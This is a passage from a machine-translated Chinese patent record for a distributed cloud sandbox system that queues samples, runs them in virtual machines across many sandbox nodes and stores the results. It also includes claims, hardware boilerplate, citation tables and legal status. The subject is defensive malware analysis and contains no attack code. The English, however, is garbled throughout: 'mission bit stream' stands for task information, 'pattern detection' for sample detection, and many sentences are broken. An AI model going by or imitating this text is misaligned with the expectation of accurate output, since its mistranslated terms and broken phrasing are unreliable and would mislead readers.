Individual pending mission bit stream is sent to shared queue;After at least one request message is received, according to each request message
Its each self-corresponding mission bit stream is obtained from shared queue.
Single node sandbox module 22, for performing being distributed for it for task respectively by multiple single node sandboxs, must take office
The data produced in business implementation procedure.
The distributed storage cluster module 23 of expansible type, is additionally operable to during the tasks carrying of single node sandbox module 21
The data of generation are sent to corresponding database.
Single node sandbox module 22, the mission bit stream specifically for reading highest priority;Determine appointing for highest priority
Whether specific sample is included in information of being engaged in;When comprising specific sample, specific parametric environmental is modified;Work as amendment
After finishing, the parameter configuration in the service condition and mission bit stream of Current resource determines to perform the task;When
After the tasks carrying is finished, corresponding task status is changed.
Single node sandbox module 22, is specifically additionally operable to if it is determined that perform the task, then run the task in virtual machine,
And by the data storage produced in operation to local disk.
Single node sandbox module 22, is specifically additionally operable in the mission bit stream when highest priority not include specific sample,
When only including md5 identifiers, corresponding sample is downloaded according to md5 identifiers;According to the task number being currently executing, it is determined that
Whether execution comprising download module download the download sample task;When it is determined that performing the task comprising the download sample,
The download sample downloaded according to download module, generates the specifying information for including task in json files, json files;According to appoint
The specifying information of business, generates the report of specified format;Change corresponding task status.
Further, as shown in Fig. 2 distributed high in the clouds detecting system also includes:Single node sandbox request of data and money
Source cleaning module 24.
Single node sandbox request of data and resource cleaning modul 24, for the use state information according to local resource
And/or the task in local data base overstocks status information, task requests are sent to server, task requests are used for server
Request task information;The mission bit stream that the reception server is returned;Mission bit stream is stored to local data base.
The distributed storage cluster module 23 of expansible type, specifically for by the second preset rules, screening tasks carrying
During belong to the data of black data in the data that produce, and the data of black data will be belonged to black data storehouse.
Single node sandbox request of data and resource cleaning modul 24, are additionally operable to every preset time, Clean Up Database.
Further, as shown in Fig. 2 distributed high in the clouds detecting system also includes:Distributed high in the clouds detecting system monitors mould
Block 25.
Distributed high in the clouds detecting system monitoring modular 25, for monitoring sandbox cluster inlet module 21, single node sandbox mould
Block 22, the distributed storage cluster module 23 of expansible type and single node sandbox request of data and resource cleaning modul 24.
The embodiments of the invention provide a kind of distributed high in the clouds detecting system, compared with the device of existing pattern detection,
Multiple pending mission bit streams are determined according to the first preset rules, and multiple pending mission bit streams are sent to shared team
Row, then after at least one request message is received, its each correspondence is obtained according to each request message from shared queue
Task, and performed respectively as its distribution task by multiple single node sandboxs, obtain the data produced during tasks carrying,
Then the data produced during tasks carrying are sent into corresponding database, i.e. distribution high in the clouds detecting system and be provided with
Multiple single node sandboxs, and being distributed for it for task can be performed simultaneously by multiple single node sandboxs, and obtain task
The data produced in implementation procedure, and the data of generation can be sent to corresponding database, to realize the detection to sample,
Due to being detected by multiple single node sandboxs to sample, without manually being detected one by one to substantial amounts of sample, from
And the cost of pattern detection can be reduced, and due to performing different tasks simultaneously by multiple single node sandboxs, so as to
The time loss of pattern detection is reduced, and then the detection efficiency to sample can be improved.
Distributed high in the clouds detecting system provided in an embodiment of the present invention goes for above method embodiment.Herein no longer
Repeat.
The embodiment of the present invention additionally provides a kind of terminal device, as shown in figure 3, for convenience of description, illustrate only and this
The related part of inventive embodiments, particular technique details is not disclosed, refer to present invention method part.The terminal is set
Standby can be to include mobile phone, tablet personal computer, PDA (Personal Digital Assistant, personal digital assistant), POS
Any terminal device such as (Point of Sales, point-of-sale terminal), vehicle-mounted computer, so that device is mobile phone as an example:
Fig. 3 is illustrated that the block diagram of the part-structure of the mobile phone related to terminal provided in an embodiment of the present invention.With reference to figure
3, mobile phone includes:Radio frequency (Radio Frequency, RF) circuit 310, memory 320, input block 330, display unit 340,
Sensor 350, voicefrequency circuit 360, Wireless Fidelity (wireless fidelity, WiFi) module 370, processor 380 and
The grade part of power supply 390.It will be understood by those skilled in the art that the handset structure shown in Fig. 3 does not constitute the restriction to mobile phone,
It can include than illustrating more or less parts, either combine some parts or different parts arrangement.
Each component parts of mobile phone is specifically introduced with reference to Fig. 3:
RF circuits 310 can be used for receive and send messages or communication process in, the reception and transmission of signal, especially, by base station
After downlink information is received, handled to processor 380;In addition, being sent to base station by up data are designed.Generally, RF circuits 310
Including but not limited to antenna, at least one amplifier, transceiver, coupler, low-noise amplifier (Low Noise
Amplifier, LNA), duplexer etc..In addition, RF circuits 310 can also be communicated by radio communication with network and other equipment.
Above-mentioned radio communication can use any communication standard or agreement, including but not limited to global system for mobile communications (Global
System of Mobile communication, GSM), general packet radio service (General Packet Radio
Service, GPRS), CDMA (Code Division Multiple Access, CDMA), WCDMA
(Wideband Code Division Multiple Access, WCDMA), Long Term Evolution (Long Term Evolution,
LTE), Email, Short Message Service (Short Messaging Service, SMS) etc..
Memory 320 can be used for storage software program and module, and processor 380 is stored in memory 320 by operation
Software program and module, so as to perform various function application and the data processing of mobile phone.Memory 320 can mainly include
Storing program area and storage data field, wherein, the application journey that storing program area can be needed for storage program area, at least one function
Sequence (such as sound-playing function, image player function etc.) etc.;Storage data field can be stored uses what is created according to mobile phone
Data (such as voice data, phone directory etc.) etc..In addition, memory 320 can include high-speed random access memory, can be with
Including nonvolatile memory, for example, at least one disk memory, flush memory device or other volatile solid-states
Part.
Input block 330 can be used for the numeral or character information for receiving input, and produce with the user of mobile phone set with
And the relevant key signals input of function control.Specifically, input block 330 may include that contact panel 331 and other inputs are set
Standby 332.Contact panel 331, also referred to as touch-screen, collecting touch operation of the user on or near it, (such as user uses
The operation of any suitable object such as finger, stylus or annex on contact panel 331 or near contact panel 331), and root
Corresponding attachment means are driven according to formula set in advance.Optionally, contact panel 331 may include touch detecting apparatus and touch
Two parts of controller.Wherein, touch detecting apparatus detects the touch orientation of user, and detects the signal that touch operation is brought,
Transmit a signal to touch controller;Touch controller receives touch information from touch detecting apparatus, and is converted into touching
Point coordinates, then give processor 380, and the order sent of reception processing device 380 and can be performed.Furthermore, it is possible to using electricity
The polytypes such as resistive, condenser type, infrared ray and surface acoustic wave realize contact panel 331.Except contact panel 331, input
Unit 330 can also include other input equipments 332.Specifically, other input equipments 332 can include but is not limited to secondary or physical bond
One or more in disk, function key (such as volume control button, switch key etc.), trace ball, mouse, action bars etc..
Display unit 340 can be used for the various of the information that is inputted by user of display or the information for being supplied to user and mobile phone
Menu.Display unit 340 may include display panel 341, optionally, can use liquid crystal display (Liquid Crystal
Display, LCD), the form such as Organic Light Emitting Diode (Organic Light-Emitting Diode, OLED) it is aobvious to configure
Show panel 341.Further, contact panel 331 can cover display panel 341, when contact panel 331 is detected thereon or attached
After near touch operation, processor 380 is sent to determine the type of touch event, with preprocessor 380 according to touch event
Type corresponding visual output is provided on display panel 341.Although in figure 3, contact panel 331 and display panel 341
It is input and the input function that mobile phone is realized as two independent parts, but in some embodiments it is possible to by touch-control
Panel 331 and the input that is integrated and realizing mobile phone of display panel 341 and output function.
Mobile phone may also include at least one sensor 350, such as optical sensor, motion sensor and other sensors.
Specifically, optical sensor may include ambient light sensor and proximity transducer, wherein, ambient light sensor can be according to ambient light
Light and shade adjust the brightness of display panel 341, proximity transducer can close display panel 341 when mobile phone is moved in one's ear
And/or backlight.As one kind of motion sensor, accelerometer sensor can detect in all directions (generally three axles) acceleration
Size, size and the direction of gravity are can detect that when static, available for identification mobile phone posture application (such as horizontal/vertical screen is cut
Change, dependent game, magnetometer pose calibrating), Vibration identification correlation function (such as pedometer, tap) etc.;May be used also as mobile phone
The other sensors such as gyroscope, barometer, hygrometer, thermometer, the infrared ray sensor of configuration, will not be repeated here.
Voicefrequency circuit 360, loudspeaker 361, microphone 362 can provide the COBBAIF between user and mobile phone.Audio-frequency electric
Electric signal after the voice data received conversion can be transferred to loudspeaker 361, sound is converted to by loudspeaker 361 by road 360
Signal output;On the other hand, the voice signal of collection is converted to electric signal by microphone 362, by voicefrequency circuit 360 receive after turn
It is changed to voice data, then after voice data output processor 380 is handled, through RF circuits 310 to be sent to such as another mobile phone,
Or export voice data to memory 320 so as to further processing.
WiFi belongs to short range wireless transmission technology, and mobile phone can help user's transceiver electronicses postal by WiFi module 370
Part, browse webpage and access streaming video etc., it has provided the user wireless broadband internet and accessed.Although Fig. 3 is shown
WiFi module 370, but it is understood that, it is simultaneously not belonging to must be configured into for mobile phone, can not change as needed completely
Become in the essential scope of invention and omit.
Processor 380 is the control centre of mobile phone, using various interfaces and the various pieces of connection whole mobile phone, is led to
Cross operation or perform and be stored in software program and/or module in memory 320, and call and be stored in memory 320
Data, perform the various functions and processing data of mobile phone, so as to carry out integral monitoring to mobile phone.Optionally, processor 380 can be wrapped
Include one or more processing units;It is preferred that, processor 380 can integrated application processor and modem processor, wherein, should
Operating system, user interface and application program etc. are mainly handled with processor, modem processor mainly handles radio communication.
It is understood that above-mentioned modem processor can not also be integrated into processor 380.
Mobile phone also includes the power supply 390 (such as battery) powered to all parts, it is preferred that power supply can pass through power supply pipe
Reason system and processor 380 are logically contiguous, so as to realize management charging, electric discharge and power managed by power-supply management system
Etc. function.
Although not shown, mobile phone can also include camera, bluetooth module etc., will not be repeated here.
In embodiments of the present invention, the processor 380 included by the device also has following functions:
Multiple pending mission bit streams are determined according to the first preset rules, and multiple pending mission bit streams are sent
To shared queue;
After at least one request message is received, its each correspondence is obtained from shared queue according to each request message
Mission bit stream, and perform being distributed for it for task respectively by multiple single node sandboxs, obtain generation during tasks carrying
Data;
The data produced during tasks carrying are sent to corresponding database.
The embodiments of the invention provide a kind of terminal device, compared with the method for existing pattern detection, the present invention is implemented
Example is applied to distributed high in the clouds detecting system, and distributed high in the clouds detecting system includes:Multiple single node sandboxs;It is default according to first
Rule determines multiple pending mission bit streams, and multiple pending mission bit streams are sent to shared queue, then when connecing
Receive after at least one request message, its each self-corresponding task is obtained from shared queue according to each request message, and lead to
Cross multiple single node sandboxs to perform respectively as its distribution task, the data produced during tasks carrying are obtained, then by task
The data produced in implementation procedure are sent is provided with multiple single nodes into corresponding database, i.e. distribution high in the clouds detecting system
Sandbox, and can perform being distributed for it for task simultaneously by multiple single node sandboxs, and during obtaining tasks carrying
The data of generation, and the data of generation can be sent to corresponding database, to realize the detection to sample, due to by many
Individual single node sandbox is detected to sample, without manually being detected one by one to substantial amounts of sample, so as to reduce
The cost of pattern detection, and due to performing different tasks simultaneously by multiple single node sandboxs, so as to reduce sample inspection
The time loss of survey, and then the detection efficiency to sample can be improved.
Terminal device provided in an embodiment of the present invention goes for above method embodiment.It will not be repeated here.
Those skilled in the art of the present technique are appreciated that the present invention includes being related to for performing in operation described herein
One or more of equipment.These equipment can be for needed for purpose and specially design and manufacture, or can also include general
Known device in computer.These equipment have the computer program being stored in it, and these computer programs are optionally
Activation is reconstructed.Such computer program can be stored in equipment (for example, computer) computer-readable recording medium or be stored in
E-command and it is coupled to respectively in any kind of medium of bus suitable for storage, the computer-readable medium is included but not
Be limited to any kind of disk (including floppy disk, hard disk, CD, CD-ROM and magneto-optic disk), ROM (Read-Only Memory, only
Read memory), RAM (Random Access Memory, immediately memory), EPROM (Erasable Programmable
Read-Only Memory, Erarable Programmable Read only Memory), EEPROM (Electrically Erasable
ProgrammableRead-Only Memory, EEPROM), flash memory, magnetic card or light card.
It is, computer-readable recording medium includes any medium for storing or transmitting information in the form of it can read by equipment (for example, computer).
Those skilled in the art of the present technique be appreciated that can be realized with computer program instructions these structure charts and/or
The combination of each frame and these structure charts and/or the frame in block diagram and/or flow graph in block diagram and/or flow graph.This technology is led
Field technique personnel be appreciated that these computer program instructions can be supplied to all-purpose computer, special purpose computer or other
The processor of programmable data processing method is realized, so as to pass through the processing of computer or other programmable data processing methods
The scheme that device is specified in the frame or multiple frames to perform structure chart disclosed by the invention and/or block diagram and/or flow graph.
Those skilled in the art of the present technique are appreciated that in the various operations discussed in the present invention, method, flow
Step, measure, scheme can be replaced, changed, combined or deleted.Further, it is each with what is discussed in the present invention
Kind operation, method, other steps in flow, measure, scheme can also be replaced, changed, reset, decomposed, combined or deleted.
Further, it is of the prior art to have and the step in the various operations disclosed in the present invention, method, flow, measure, scheme
It can also be replaced, changed, reset, decomposed, combined or deleted.
Described above is only some embodiments of the present invention, it is noted that for the ordinary skill people of the art
For member, under the premise without departing from the principles of the invention, some improvements and modifications can also be made, these improvements and modifications also should
It is considered as protection scope of the present invention.
Claims (10)
1. a kind of method of pattern detection, applied to distributed high in the clouds detecting system, it is characterised in that the distributed high in the clouds inspection
Examining system includes:Multiple single node sandboxs;Methods described includes:
Multiple pending mission bit streams are determined according to the first preset rules, and the multiple pending mission bit stream is sent
To shared queue;
After at least one request message is received, its each correspondence is obtained from the shared queue according to each request message
Mission bit stream, and perform being distributed for it for task respectively by multiple single node sandboxs, obtain generation during tasks carrying
Data;
The data produced during the tasks carrying are sent to corresponding database.
2. according to the method described in claim 1, it is characterised in that the mode that single node sandbox performs task includes:
Read the mission bit stream of highest priority;
Determine whether include specific sample in the mission bit stream of the highest priority;
If comprising specific sample, being modified to specific parametric environmental;
After amendment is finished, the parameter configuration in the service condition and mission bit stream of Current resource determines to hold
The row task;
After the tasks carrying is finished, corresponding task status is changed.
3. method according to claim 2, it is characterised in that the service condition and task according to Current resource
After the step of parameter configuration in information determines to perform the task, in addition to:
If it is determined that performing the task, then the task is run in virtual machine, and by the data storage produced in operation to local
Disk.
4. according to the method in claim 2 or 3, it is characterised in that the mission bit stream for determining the highest priority
In whether include specific sample the step of after, in addition to:
If not including specific sample in the mission bit stream of the highest priority, only comprising md5 identifiers, then according to described
Md5 identifiers download corresponding sample;
According to the task number being currently executing, it is determined whether perform the including the download sample of the task;
If it is determined that performing the including the download sample of the task, then according to the download sample, json files, the json files are generated
In include the specifying information of task;
According to the specifying information of the task, the report of specified format is generated, and changes corresponding task status.
5. according to the method described in claim 1, it is characterised in that methods described also includes:
Task in the use state information and/or local data base of local resource overstocks status information, is sent out to server
Task requests are sent, the task requests are used for server request task information;
The mission bit stream that the server is returned is received, and the mission bit stream is stored to local data base.
6. according to the method described in claim 1, it is characterised in that described to send out the data produced during the tasks carrying
The step of delivering to corresponding database, including:
By the second preset rules, the data for belonging to black data in the data produced during the tasks carrying are screened, and will
The data for belonging to black data are to black data storehouse.
7. method according to claim 6, it is characterised in that methods described also includes:
Every preset time, Clean Up Database.
8. a kind of distributed high in the clouds detecting system, it is characterised in that including:
Sandbox cluster inlet module, for determining multiple pending mission bit streams according to the first preset rules;Will be the multiple
Pending mission bit stream is sent to shared queue;After at least one request message is received, according to each request message from
Its each self-corresponding mission bit stream is obtained in the shared queue;
Single node sandbox module, for performing being distributed for it for task respectively by multiple single node sandboxs, obtains tasks carrying
During the data that produce;
The distributed storage cluster module of expansible type, is additionally operable to produce in the single node sandbox module design task implementation procedure
Data send to corresponding database.
9. distributed high in the clouds detecting system according to claim 8, it is characterised in that
The single node sandbox module, the mission bit stream specifically for reading highest priority;Determine the highest priority
Whether specific sample is included in mission bit stream;When comprising specific sample, specific parametric environmental is modified;When repairing
After just finishing, the parameter configuration in the service condition and mission bit stream of Current resource determines to perform the task;
After the tasks carrying is finished, corresponding task status is changed.
10. a kind of terminal device, including memory, processor and storage are on a memory and the calculating that can run on a processor
Machine program, it is characterised in that the pattern detection described in claim any one of 1-7 is realized during the computing device described program
Method.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201710453830.3A CN107171894A (en) | 2017-06-15 | 2017-06-15 | The method of terminal device, distributed high in the clouds detecting system and pattern detection |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201710453830.3A CN107171894A (en) | 2017-06-15 | 2017-06-15 | The method of terminal device, distributed high in the clouds detecting system and pattern detection |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| CN107171894A true CN107171894A (en) | 2017-09-15 |
Family
ID=59819632
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201710453830.3A Pending CN107171894A (en) | 2017-06-15 | 2017-06-15 | The method of terminal device, distributed high in the clouds detecting system and pattern detection |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN107171894A (en) |
Cited By (8)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN108021400A (en) * | 2017-11-29 | 2018-05-11 | 腾讯科技(深圳)有限公司 | Data processing method and device, computer-readable storage medium and equipment |
| CN108040110A (en) * | 2017-12-11 | 2018-05-15 | 国网宁夏电力有限公司信息通信公司 | A kind of mobile data safety means of defence based on security sandbox |
| CN108377263A (en) * | 2018-02-02 | 2018-08-07 | 北京杰思安全科技有限公司 | Adaptive private clound sandbox setting method, equipment and medium |
| CN108429754A (en) * | 2018-03-19 | 2018-08-21 | 深信服科技股份有限公司 | A kind of high in the clouds Distributed Detection method, system and relevant apparatus |
| CN108874617A (en) * | 2017-12-29 | 2018-11-23 | 北京安天网络安全技术有限公司 | Detection task distributing method, device, electronic equipment and storage medium |
| CN108881150A (en) * | 2017-12-29 | 2018-11-23 | 北京安天网络安全技术有限公司 | A kind of processing method of Detection task, device, electronic equipment and storage medium |
| CN110247934A (en) * | 2019-07-15 | 2019-09-17 | 杭州安恒信息技术股份有限公司 | The method and system of internet-of-things terminal abnormality detection and response |
| CN113132324A (en) * | 2019-12-31 | 2021-07-16 | 奇安信科技集团股份有限公司 | Sample identification method and system |
Citations (7)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101692267A (en) * | 2009-09-15 | 2010-04-07 | 北京大学 | Method and system for detecting large-scale malicious web pages |
| CN103685251A (en) * | 2013-12-04 | 2014-03-26 | 电子科技大学 | Android malicious software detecting platform oriented to mobile internet |
| CN104766007A (en) * | 2015-03-27 | 2015-07-08 | 杭州安恒信息技术有限公司 | Method for quickly recovering sandbox based on file system filter driver |
| CN105453097A (en) * | 2013-05-31 | 2016-03-30 | 微软技术许可有限责任公司 | Restricted driver platform runs drivers in sandbox in user mode |
| CN105760755A (en) * | 2016-02-24 | 2016-07-13 | 浪潮通用软件有限公司 | Visual Studio extension pack isolation method |
| CN106557355A (en) * | 2016-12-01 | 2017-04-05 | 北京奇虎科技有限公司 | The generation method and generating means of virtual machine image |
| CN106650423A (en) * | 2016-11-28 | 2017-05-10 | 北京奇虎科技有限公司 | Object sample file detecting method and device |
-
2017
- 2017-06-15 CN CN201710453830.3A patent/CN107171894A/en active Pending
Patent Citations (7)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101692267A (en) * | 2009-09-15 | 2010-04-07 | 北京大学 | Method and system for detecting large-scale malicious web pages |
| CN105453097A (en) * | 2013-05-31 | 2016-03-30 | 微软技术许可有限责任公司 | Restricted driver platform runs drivers in sandbox in user mode |
| CN103685251A (en) * | 2013-12-04 | 2014-03-26 | 电子科技大学 | Android malicious software detecting platform oriented to mobile internet |
| CN104766007A (en) * | 2015-03-27 | 2015-07-08 | 杭州安恒信息技术有限公司 | Method for quickly recovering sandbox based on file system filter driver |
| CN105760755A (en) * | 2016-02-24 | 2016-07-13 | 浪潮通用软件有限公司 | Visual Studio extension pack isolation method |
| CN106650423A (en) * | 2016-11-28 | 2017-05-10 | 北京奇虎科技有限公司 | Object sample file detecting method and device |
| CN106557355A (en) * | 2016-12-01 | 2017-04-05 | 北京奇虎科技有限公司 | The generation method and generating means of virtual machine image |
Cited By (13)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN108021400A (en) * | 2017-11-29 | 2018-05-11 | 腾讯科技(深圳)有限公司 | Data processing method and device, computer-readable storage medium and equipment |
| CN108021400B (en) * | 2017-11-29 | 2022-03-29 | 腾讯科技(深圳)有限公司 | Data processing method and device, computer storage medium and equipment |
| CN108040110A (en) * | 2017-12-11 | 2018-05-15 | 国网宁夏电力有限公司信息通信公司 | A kind of mobile data safety means of defence based on security sandbox |
| CN108040110B (en) * | 2017-12-11 | 2020-10-27 | 国网宁夏电力有限公司信息通信公司 | Mobile data security protection method based on security sandbox |
| CN108874617B (en) * | 2017-12-29 | 2021-09-21 | 北京安天网络安全技术有限公司 | Detection task distribution method and device, electronic equipment and storage medium |
| CN108874617A (en) * | 2017-12-29 | 2018-11-23 | 北京安天网络安全技术有限公司 | Detection task distributing method, device, electronic equipment and storage medium |
| CN108881150A (en) * | 2017-12-29 | 2018-11-23 | 北京安天网络安全技术有限公司 | A kind of processing method of Detection task, device, electronic equipment and storage medium |
| CN108881150B (en) * | 2017-12-29 | 2021-03-23 | 北京安天网络安全技术有限公司 | Detection task processing method and device, electronic equipment and storage medium |
| CN108377263A (en) * | 2018-02-02 | 2018-08-07 | 北京杰思安全科技有限公司 | Adaptive private clound sandbox setting method, equipment and medium |
| CN108429754A (en) * | 2018-03-19 | 2018-08-21 | 深信服科技股份有限公司 | A kind of high in the clouds Distributed Detection method, system and relevant apparatus |
| CN110247934A (en) * | 2019-07-15 | 2019-09-17 | 杭州安恒信息技术股份有限公司 | The method and system of internet-of-things terminal abnormality detection and response |
| CN113132324A (en) * | 2019-12-31 | 2021-07-16 | 奇安信科技集团股份有限公司 | Sample identification method and system |
| CN113132324B (en) * | 2019-12-31 | 2023-04-28 | 奇安信科技集团股份有限公司 | Sample identification method and system |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN107171894A (en) | The method of terminal device, distributed high in the clouds detecting system and pattern detection | |
| US20160241589A1 (en) | Method and apparatus for identifying malicious website | |
| US8005943B2 (en) | Performance monitoring of network applications | |
| CN105553769A (en) | Data collecting-analyzing system and method | |
| CN108345543B (en) | Data processing method, device, equipment and storage medium | |
| CN103336925B (en) | A kind of method and apparatus scanning acceleration | |
| CN112491602B (en) | Behavior data monitoring method and device, computer equipment and medium | |
| CN107908952B (en) | Method and device for identifying real machine and simulator and terminal | |
| CN106709346A (en) | File processing method and device | |
| CN104298686B (en) | The method and apparatus for modifying server profile | |
| CN105516321A (en) | Data acquisition method and device | |
| CN107229618A (en) | A kind of method and device for showing the page | |
| CN113254320A (en) | Method and device for recording user webpage operation behaviors | |
| CN107918529A (en) | Image processing method and device, computer equipment, computer-readable recording medium | |
| CN105653589A (en) | Information processing method and device | |
| CN111510557A (en) | Content processing method and electronic equipment | |
| CN109246233A (en) | Data processing method, device, equipment and storage medium based on on-line monitoring | |
| CN115398861B (en) | Abnormal file detection method and related product | |
| CN103618761B (en) | Method and browser for processing cookie information | |
| CN105373715A (en) | Wearable device based data access method and apparatus | |
| CN116861198A (en) | Data processing method, device and storage medium | |
| CN105978749A (en) | Monitoring method of computer hardware information in local area network and system thereof | |
| CN115203194A (en) | Metadata information generation method, related device, equipment and storage medium | |
| CN109992614B (en) | Data acquisition method, device and server | |
| CN114490307A (en) | Unit testing method, device and storage medium |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| RJ01 | Rejection of invention patent application after publication |
Application publication date: 20170915 |
|
| RJ01 | Rejection of invention patent application after publication |